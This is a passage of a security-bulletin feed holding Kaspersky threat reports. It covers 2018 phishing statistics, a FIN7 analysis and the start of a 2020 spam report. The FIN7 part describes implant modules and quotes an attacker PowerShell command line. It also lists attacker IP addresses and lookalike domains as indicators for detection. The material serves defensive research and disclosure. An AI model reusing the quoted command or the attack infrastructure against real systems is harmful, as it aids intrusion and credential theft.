Vietnam (5.09%). Trailing Vietnam by 1.35 p.p. in seventh was the UAE (3.74%). India (3.15%), Spain (2.51%), and Taiwan (2.44%) rounded off the Top 10.\n\n## Statistics: phishing\n\nIn 2018, the Anti-Phishing system was triggered 482,465,211 times on Kaspersky Lab user computers as a result of phishing redirection attempts (236,233,566 more than in 2017). In total, 18.32% of our users were attacked.\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an email or on the Internet to a phishing page in the event that such links have yet to be added to Kaspersky Lab's databases._\n\n### Rating of categories of organizations attacked by phishers\n\nIn 2018, the global Internet portals accounted for the lion's share of heuristic component triggers. Its slice increased by 11.23 p.p. to 24.72% against the previous year. In second place came the banking sector (21.70%), down 5.3 p.p. Payment systems (14.02%) in 2018 ranked third.\n\n_Distribution of organizations subject to phishing attacks by category, 2018._[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150819/en-attacked-organizations.png>)\n\n### Top 3 organizations under attack from phishers\n\nThis rating is made of organizations whose names were most frequently used by phishers (according to the heuristic statistics for triggers on user computers). It was the same lineup as in 2017, but rearranged slightly, with Microsoft in first place. \n \nMicrosoft | 6.86% \nFacebook | 6.37% \nPayPal | 3.23% \n \n### Attack geography\n\n#### Countries by share of attacked users\n\nBrazil (28.28%) remains out in front by percentage of attacked unique users out of the total number of users in the country.\n\n_Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky Lab users in the country, 2018 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150924/en-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country** | **%** \n---|--- \nBrazil | 28.28 \nPortugal | 22.63 \nAustralia | 20.72 \nAlgeria | 20.46 \nR\u00e9union | 20.39 \nGuatemala | 20.34 \nChile | 20.09 \nSpain | 20.05 \nVenezuela | 19.89 \nRussia | 19.76 \n \n_Top 10 countries by share of attacked users_\n\nDespite a slight drop of 0.74 p.p., Brazil (28.28%) remains top by number of attacked users. Meanwhile, Portugal (22.63%) moved up to second place (+5.87 p.p.), displacing Australia (20.72%, \u20131.79 p.p.).\n\n## Conclusion\n\n2018 showed that cybercriminals continue to keep a close eye on global events and use them to achieve their goals. We have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019. Despite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this topic.\n\nThe past year also demonstrated that spammers and scammers will continue to exploit annually occurring events \u2014 new smartphone launches, sales seasons, tax deadlines/rebates, and the like.\n\nThere is also a trend toward the transition to new channels of content distribution: Cybercriminals in 2018 used new methods of communication with their \"audience,\" including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages. Hand in hand with this, as illustrated by the attack on universities, fraudsters are seeking not only new channels, but new targets as well.", "cvss3": {}, "published": "2019-03-12T10:00:16", "type": "securelist", "title": "Spam and phishing in 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-12T10:00:16", "id": "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "href": "https://securelist.com/spam-and-phishing-in-2018/89701/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\nOn August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in their malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts.\n\nIn 2018-2019, researchers of Kaspersky Lab's Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.\n\n## **Recent FIN7 campaigns**\n\nThe FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. The spear phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.\n\n### **Malicious Documents**\n\nWe have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim's computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as \"12345\", \"1234\", etc., uses macros to execute a GRIFFON implant on the target's computer. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.\n\nInterestingly, following some open-source publications about them, the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. Moreover, the builder allows these to modify different IOCs, such as the filenames of wscript.exe or sctasks.exe copies, etc.\n\n**wscript.exe copy** | **sctasks copy** | **Task name** | **C2** \n---|---|---|--- \n**byzNne10.exe** | byzNne17.exe | TaskbyzNne | logitech-cdn.com \nc9FGG10.exe | c9FGG17.exe | Taskc9FGG | logitech-cdn.com \n**zEsb10.exe** | zEsb17.exe | TaskzEsb | servicebing-cdn.com \n \nIOCs extracted from docs which use sctasks for GRIFFON persistence\n\n**Author** | **Company** | **wscript.exe copy** | **C2** \n---|---|---|--- \nmogjxjtvte | mogjxjtvte | mswmex44.exe | logitech-cdn[.]com \nsoxvremvge | soxvremvge | c9FGG10.exe | logitech-cdn[.]com \ngareljtjhvd | gareljtjhvd | zEsb10.exe | servicebing-cdn[.]com \n \nIOCs extracted from regular documents associated to GRIFFON\n\n### **GRIFFON Implant**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144433/sas-fin-7-1.png>)\n\n_Griffon Malware attack pattern_\n\nThe GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. We were able to obtain four different modules during the investigation.\n\n#### **Reconnaissance module**\n\nThe first module downloaded by the GRIFFON malware to the victim's computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators. Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation's monitors.\n\n#### **Meterpreter downloader**\n\nThe second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as \"_Tinymet_\". This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute.\n\n#### **Screenshot module**\n\nThe third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at \"%TMP%/image.png\", sent back to the attackers by the GRIFFON implant and then deleted.\n\n#### **Persistence module**\n\nThe last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim's workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \"file-less\" aspect of this method.\n\nThrough its light weight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim's workstation.\n\n## **On the hunt for GRIFFON infrastructure**\n\nAttackers make mistakes, and FIN7 are no exception. The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators created fake HTTP 302 redirection to various Google services on their C2s servers.\n \n \n HTTP/1.1 302 Found\n Server: nginx\n Date: [retracted]\n Content-Type: text/html; charset=UTF-8\n Content-Length: 0\n Connection: keep-alive\n Location: https://cloud.google.com/cdn/\n\n**Returned headers for most of the GRIFFON C2s servers on port 443**\n\nThis error allowed us to follow the infrastructure week by week, until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking against their infrastructure.\n\n### **Fake pentest company**\n\nDuring the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.\n\nAccording to the website, that domain supposedly belongs to a legitimate security company \"fully owned by the Russian Government\" (sic.) and having offices in \"Moscow, Saint Petersburg and Yekaterinburg\", but the address says the company is located in Trump Tower, in New York. Given FIN7's previous use of false security companies, we decided to look deeper into this one.\n\nAs we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. Phrases and sentences were borrowed from at least the following companies/sites:\n\n * DKSec \u2013 www.dksec.com\n * OKIOK \u2013 www.okiok.com/services/tailored-solutions\n * MainNerve \u2013 www.mainnerve.com\n * Datics \u2013 www.datatics.com/cyber-security\n * Perspective Risk \u2013 www.perspectiverisk.com\n * Synack \u2013 https://www.synack.com/company\n * FireEye \u2013 https://www.fireeye.com/services/penetration-testing.html\n\nThis company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.\n\nIn addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.\n\n## **Links to other intrusion sets**\n\nWhile tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.\n\n### **CobaltGoblin/EmpireMonkey**\n\nIn his history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants for targeting mainly banks, and developers of banking and money processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims' networks. After a successful penetration, it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.\n\nFIN7's last campaigns were targeting banks in Europe and Central America. This threat actor stole [suspected of stealing](<https://www.timesofmalta.com/articles/view/20190225/local/how-bov-hackers-got-away-with-13-million.702800>) \u20ac13 million from Bank of Valetta, Malta earlier this year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07150038/sas-fin-7-2.png>)\n\nExample of malicious documents used in the end of 2018 to beginning of 2019\n\nA few interesting overlaps in recent FIN7 campaigns:\n\n * Both used macros to copy wscript.exe to another file, which began with \"ms\" (mses.exe \u2013 FIN7, msutil.exe \u2013 EmpireMonkey).\n * Both executed a JScript file named \"error\" in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).\n * Both used DocuSign decoy documents with different macros. The macros popped the same \"Document decryption error\" error message\u2014even if macro code remain totally different.\n\nWe have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.\n\n### **AveMaria**\n\nAveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.\n\nTo deliver their malware, the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. What is interesting, in some emails, they ask targets to phone them if they have any questions, like the FIN7 guys do.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144536/sas-fin-7-4.png>)\n\nExample of AveMaria spearphing emails. Criminals suggest calling them.\n\nDuring the investigation into FIN7, our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria. Basically, two servers in the same IP range and AS14576 (autonomous system) share a non-standard SSH port, which is 222. One of the servers is a Griffon C2, and the other one, an AveMaria C2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144550/sas-fin-7-5.png>)\n\nDistribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. Most AveMaria targets (72%) were in the EU.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144612/sas-fin-7-6.png>)\n\n### **CopyPaste**\n\nAt the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity that we temporarily called \"CopyPaste\" from a previously unknown APT. Interestingly, this actor targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center.\n\nThis set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim's networks and avoid detection.\n\nHere are the main similarities between CopyPaste and FIN7:\n\n * Both used the same Microsoft PowerShell argument obfuscation order: \"powershell.exe -NoP -NonI -ExecutionPolicy Bypass\". We have only seen FIN7 and CopyPaste use this argument list for executing their malicious Powershell Scripts.\n * Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digitcert and Microsoft websites and used decoy job employment and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too, FIN7 on its GRIFFON C2s before January 2018, and Cobalt, on its staging servers, similar to CopyPaste.\n * Quite recently, FIN7 threat actors typosquatted the brand \"Digicert\" using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with their domains digicertweb[.]com and digi-cert[.]org, both used as a Powershell Empire C2 with decoy HTTP 302 redirects to the legitimate Digicert website.\n\nThe links between CopyPaste and FIN7 are still very weak. It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.\n\n## **Conclusions**\n\nDuring 2018, Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader will have an impact on the group's operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various level of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.\n\nThe first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.\n\nWe link the AveMaria botnet to these two groups with medium confidence: AveMaria's targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The last piece is the newly discovered CopyPaste group, who targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.\n\nAll of the aforementioned groups greatly benefit from unpatched systems in corporate environments. They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.\n\nFIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company \"Combi Security\", we are confident that they continue to create new personas for use in either targeting or recruiting under a \"new\" brand, \"IPC\".\n\nMore information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com\n\n## **Indicators of compromise**\n\n#### **AveMaria**\n\n * 185.61.138.249\n * tain.warzonedns[.]com\n * noreply377.ddns[.]net\n * 185.162.131.97\n * 91.192.100.62\n * server.mtcc[.]me\n * doddyfire.dyndns[.]org\n * 212.8.240.116\n * 168.167.45.162\n * toekie.ddns[.]net\n * warmaha.warzonedns[.]com\n\n#### **CopyPaste**\n\n * digi-cert[.]org\n * somtelnetworks[.]com\n * geotrusts[.]com\n * secureclientupdate[.]com\n * digicertweb[.]com\n * sport-pesa[.]org\n * itaxkenya[.]com\n * businessdailyafrica[.]net\n * infotrak-research[.]com\n * nairobiwired[.]com\n * k-24tv[.]com\n\n#### **FIN7/GRIFFON**\n\n * hpservice-cdn[.]com\n * realtek-cdn[.]com\n * logitech-cdn[.]com\n * pci-cdn[.]com\n * appleservice-cdn[.]com\n * servicebing-cdn[.]com\n * cisco-cdn[.]com\n * facebook77-cdn[.]com\n * yahooservices-cdn[.]com\n * globaltech-cdn[.]com\n * infosys-cdn[.]com\n * google-services-s5[.]com\n * instagram-cdn[.]com\n * mse-cdn[.]com\n * akamaiservice-cdn[.]com\n * booking-cdn[.]com\n * live-cdn2[.]com\n * cloudflare-cdn-r5[.]com\n * cdnj-cloudflare[.]com\n * bing-cdn[.]com\n * servicebing-cdn[.]com\n * cdn-yahooapi[.]com\n * cdn-googleapi[.]com\n * googl-analytic[.]com\n * mse-cdn[.]com\n * tw32-cdn[.]com\n * gmail-cdn3[.]com\n * digicert-cdn[.]com\n * vmware-cdn[.]com\n * exchange-cdn[.]com\n * cdn-skype[.]com\n * windowsupdatemicrosoft[.]com\n * msdn-cdn[.]com\n * testing-cdn[.]com\n * msdn-update[.]com\n\n#### **EmpireMonkey/CobaltGoblin**\n\n_In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names._\n\n * (entity)-corporate[.]com\n * (entity)-cert[.]com\n * (entity)-no[.]org\n * (entity)-fr[.]org\n * (entity)-acquisition[.]org\n * (entity)-trust[.]org\n * riscomponents[.]pw\n * nlscdn[.]com", "cvss3": {}, "published": "2019-05-08T10:00:04", "type": "securelist", "title": "FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-05-08T10:00:04", "id": "SECURELIST:163368D119719D834280EA969EDB785D", "href": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-18T10:30:48", "description": "\n\n## Figures of the year\n\nIn 2020:\n\n * The share of spam in email traffic amounted to 50.37%, down by 6.14 p.p. from 2019.\n * Most spam (21.27%) originated in Russia.\n * Kaspersky solutions detected a total of 184,435,643 malicious attachments.\n * The email antivirus was triggered most frequently by email messages containing members of the [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) malware family.\n * The Kaspersky Anti-Phishing component blocked 434,898,635 attempts at accessing scam sites.\n * The most frequent targets of phishing attacks were online stores (18.12 per cent).\n\n## Trends of the year\n\n### Contact us to lose your money or account!\n\nIn their email campaigns, scammers who imitated major companies, such as Amazon, PayPal, Microsoft, etc., increasingly tried to get users to contact them. Various pretexts were given for requesting the user to get in touch with &quot;support&quot;: order confirmation, resolving technical issues, cancellation of a suspicious transaction, etc. All of these messages had one thing in common: the user was requested to call a support number stated in the email. Most legitimate messages give recipients constant warnings of the dangers of opening links that arrive by email. An offer to call back was supposed to put the addressees off their guard. Toll-free numbers were intended to add further credibility, as the support services of large companies often use these. The scammers likely expected their targets to use the provided phone number to get help instantly in a critical situation, rather than to look for a contact number or wait for a written response from support.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09145859/2020_spam_report_ru_01.png>)\n\nThe contact phone trick was heavily used both in email messages and on phishing pages. The scammers were simply betting on the visitor to turn their attention to the number and unsettling warning message against the red background, rather than the address bar of the fake website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150200/2020_spam_report_02.png>)\n\nWe assume that those who called the numbers were asked to provide the login and password for the service that the scammers were imitating, or to pay for some diagnostics and troubleshooting services.\n\n### Reputation, bitcoins or your life?\n\nIn 2020, Bitcoin blackmailers stuck to their old scheme, demanding that their victims transfer money to a certain account and threatening adversity for failure to meet their demands. Threats made by extortionists grew in diversity. In most cases, scammers, as before, claimed to have used spyware to film the blackmail victim watching adult videos. In a reflection of the current trends for online videoconferencing, some email campaigns claimed to have spied on their victims with the help of Zoom. This year, too, blackmailers began to take advantage of news sensations to add substance to their threats. This is very similar to the techniques of &quot;Nigerian&quot; scammers, who pose as real political figures or their relatives, offering tons of money, or otherwise link their messages with concurrent global events. In the case of bitcoin blackmail, the media component was supposed to be a strong argument in the eyes of the victim for paying the ransom without delay, so cybercriminals cited the example of media personalities whose reputation suffered because of an explicit video being published.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/10122307/2020_spam_report_es_03.png>)This year, we have seen threats made against companies, too. A company was told to transfer a certain amount to a Bitcoin wallet to prevent a DDoS attack that the cybercriminals threatened to unleash upon it. They promised to provide a demonstration to prove that their threats were real: no one would be able to use the services, websites or email of the company under attack for thirty minutes. Interestingly, the cybercriminals did not limit their threats to DDoS. As with blackmail aimed at individuals, they promised to damage the company&#x27;s reputation even more, should it fail to pay up, by stealing confidential information, specifically, its business data. The attackers introduced themselves as well-known APT groups to add weight to their threats. For example, in the screenshot below, they call themselves Venomous Bear, also known as Waterbug or [Turla](<https://securelist.com/tag/turla/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150638/2020_spam_report_04.png>)\n\nThe senders of an email that talked about a bomb planted in company&#x27;s offices went much further with their threats. The amount demanded by the blackmailers was much larger than in previous messages: $20,000. To make their threats sound convincing enough, the cybercriminals provided details of the &quot;attack&quot;: an intention to blow up the bomb if the police intervened, the substance used, the explosive yield and plans to threaten other blackmail victims with the explosion.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150700/2020_spam_report_05.png>)\n\n### Attacks on the corporate sector\n\nTheft of work accounts and infecting of office computers with malware in [targeted attacks](<https://encyclopedia.kaspersky.com/glossary/targeted-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) are the main risk that companies have faced this year. Messages that imitated business email or notifications from major services offered to view a linked document or attached HTML page. Viewing the file required entering the password to the recipient&#x27;s corporate email account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150725/2020_spam_report_06.png>)\n\nReasons given for asking users to open a link or attachment could be varied: a need to install an update, unread mail, quarantined mail or unread chat messages. The cybercriminals created web pages that were designed to look like they belonged to the company under attack. URL parameters including the corporate email address were pushed to the fake page with the help of JavaScript. This resulted in the user seeing a unique page with a pre-entered email address and a design generated to imitate the company&#x27;s corporate style. The appearance of that page could lull the potential victim into a false sense of security, as all they needed to do was enter their password.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150752/2020_spam_report_07.png>)\n\nDuring this type of attacks scammers began to make broader use of &quot;voice messaging&quot;. The appearance of the messages imitated business email.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150815/2020_spam_report_08.png>)\n\nThe link could lead directly to a phishing site, but there also was a more complex scenario, in which the linked page looked like an audio player. When the recipient tried playing the file, they were asked to enter the credentials for their corporate mailbox.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150842/2020_spam_report_09.png>)\n\nDemand for online videoconferencing amid remote work led to a surge in fake online meeting invitations. A significant distinctive feature, which should have alarmed the recipients of the fake invitations, were the details that the page was asking them to enter in order to join the meeting. To access a real Zoom meeting, you need to know the meeting ID and password. The fake videoconference links opened fake Microsoft and WeTransfer pages, which contained fields for entering the login and password for a work account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150908/2020_spam_report_10.png>)\n\n### Messengers targeted\n\nScammers who were spreading their chain mail via social networks and instant messaging applications began to favor the latter. Message recipients, mostly in WhatsApp, were promised a discount or prize if they opened a link sent to them. The phishing web page contained a tempting message about a money prize, award or other, equally desirable, surprises.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09150934/2020_spam_report_11.png>)\n\nThe recipient had to fulfill two conditions: answer a few simple questions or fill out a questionnaire, and forward the message to a certain number of their contacts. Thus, the victim turned into a link in the spam chain, while subsequent messages were sent from a trusted address, thus avoiding anti-spam filters.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151012/2020_spam_report_12.png>)\n\nBesides that, a message from someone that the recipient knew would have much more credibility. Thus, the chain continued to grow, and the scammers went on enriching themselves. After all, even if the victim did fulfill the conditions, getting that promised prize proved not so simple, as the &quot;lucky&quot; recipient was urged to pay bank commission.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151040/2020_spam_report_13.png>)\n\n### COVID-19\n\n#### &quot;Public relief&quot; by spammers\n\nMany governments did their best to help citizens during the pandemic. That initiative, together with the fact that people on the whole were willing to get payouts, became a theme for spam campaigns. Both individuals and companies were exposed to the risk of being affected by cybercriminals&#x27; schemes.\n\nMessages offering financial aid to businesses hurt by the pandemic or to underprivileged groups could crop up in social media feeds or arrive through instant messaging networks. The main requirement for getting the funds was filling out a detailed personal questionnaire. Those who took the step found that a small commission was required as well. Real government payouts these days are made through public portals that also serve other purposes and do not require additional registration, questionnaires or commissions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151111/2020_spam_report_14.png>)\n\nCybercriminals who offered tax deductions to companies employed a similar scheme. As in the examples above, the reason provided for the easing of tax policy was the pandemic, and in particular, anticipation of a second wave of COVID-19.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151347/2020_spam_report_16.png>)\n\nHowever, offers of tax deductions and compensations were hiding not just the danger of losing money but losing one&#x27;s account to the scammers, too, as many of the messages contained phishing links.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151415/2020_spam_report_17.png>)\n\n#### Malicious links\n\nEmail campaigns that promised compensation could also threaten computer security. Messages in Turkish, just as those mentioned earlier, offered a payout from Turkey&#x27;s Ministry of Health \u2013 not always mentioned by name \u2013 but getting the money required downloading and installing an APK file on the recipient&#x27;s smartphone. The attack was targeting Android users, and the downloadable application contained a copy of the [Trojan-Dropper.AndroidOS.Hqwar.cf](<https://threats.kaspersky.com/en/threat/Trojan-Dropper.AndroidOS.Hqwar/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151443/2020_spam_report_18.png>)\n\nA fear of being infected with a new virus and a desire to know as much as possible about it could prompt recipients to review the email and open the links that it contained, as long as the message had been sent by a well-known organization. Fake letters from the WHO purporting to contain the latest safety advice were distributed in a variety of languages. The attachment contained files with various extensions. When the recipient tried to open these, malware was loaded onto the computer. In the message written in English, the attackers spread the [Backdoor.Win32.Androm.tvmf](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>), and in the one written in Italian, the [Trojan-Downloader.MSOffice.Agent.gen](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151520/2020_spam_report_19.png>)\n\n#### Viral postal services\n\nCOVID-19 was also mentioned in fake email messages that mimicked notifications from delivery services. The sender said that there was a problem with delivering an order due to the pandemic, so the recipient needed to print out the attachment and take it to the nearest DHL office. The attached file contained a copy of the [HEUR:Trojan.Java.Agent.gen](<https://threats.kaspersky.com/en/threat/Trojan.Java.Agent/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151550/2020_spam_report_20.png>)\n\n#### The corporate sector\n\nSpam that targeted companies also exploited the COVID-19 theme, but the cybercriminals occasionally relied on a different kind of tricks. For example, one of the emails stated that technical support had created a special alert system to minimize the risk of a new virus infection. All employees were required to log in to this system using their corporate account credentials and review their schedules and tasks. The link opened a phishing page disguised as the Outlook web interface.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151659/2020_spam_report_21.png>)\n\nIn another instance, scammers were sending copies of the [HEUR:Trojan-PSW.MSIL.Agensla.gen](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) in the form of an email attachment. The scammers explained that the recipient needed to open the attached file, because the previous employee, who was supposed to send the &quot;documentation&quot;, had quit over COVID-19, and the papers had to be processed within three days.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/09151724/2020_spam_report_22.png>)\n\n#### &quot;Nigerian&quot; crooks making money from the pandemic\n\nEmail from [&quot;Nigerian&quot; scammers](<https://encyclopedia.kaspersky.com/glossary/419-scam/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and fake notifications of surprise lottery winnings regularly tapped the pandemic theme. The message in Korean shown below says that the recipient&#x27;s email address had been selected randomly by some center in Istanbul for a coronavirus-related emergency payout. Such surprise notices of winnings and compensations were generally sent out in a variety of languages. Messages from some lucky individuals who had won a huge sum and wished to support their fellow creatures in the difficult times of the pandemic were another variation on the &quot;Nigerian&quot; 